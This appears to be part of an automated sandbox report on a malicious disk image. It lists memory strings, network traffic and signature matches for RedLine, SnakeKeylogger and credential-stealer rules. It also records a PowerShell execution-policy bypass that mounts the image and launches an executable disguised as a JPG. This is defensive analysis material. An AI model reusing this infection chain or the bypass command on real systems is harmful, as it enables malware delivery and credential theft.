        Source: svchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.000000000580D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B78000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006818000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.000000000580D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000683D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt/
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txtD
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000683D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com/
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B78000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006818000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com;
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005A32000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B78000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006818000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000683D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
        Source: svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=eicar
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB5r
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknown | Network traffic detected: HTTP traffic on port 49800 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49794 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49807 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49806 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49807
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49806
        Source: unknown | Network traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49804
        Source: unknown | Network traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49802
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49800
        Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49807 version: TLS 1.2

        System Summary

        Source: 00000007.00000002.31560050751.0000000003570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 00000008.00000002.33967794321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: Process Memory Space: svchost.exe PID: 8376, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: \Device\CdRom0\9236-pagaconferma-jpg.exeJump to dropped file
        Source: unknownDriver loaded: C:\Windows\System32\drivers\udfs.sys
        Source: 00000007.00000002.31560050751.0000000003570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 00000008.00000002.33967794321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: Process Memory Space: svchost.exe PID: 8376, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: classification engine | Classification label: mal100.troj.spyw.evad.winIMG@7/8@3/3
        Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\Desktop\tmp.log
        Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:304:WilStaging_02
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3sb3z55.j0i.ps1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005965000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005971000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006957000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A3E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
        Source: g1TLK7mbZD.img | ReversingLabs: Detection: 31%
        Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
        Source: unknown | Process created: \Device\CdRom0\9236-pagaconferma-jpg.exe "D:\9236-pagaconferma-jpg.exe"
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exe | Process created: C:\Windows\SysWOW64\svchost.exe "D:\9236-pagaconferma-jpg.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
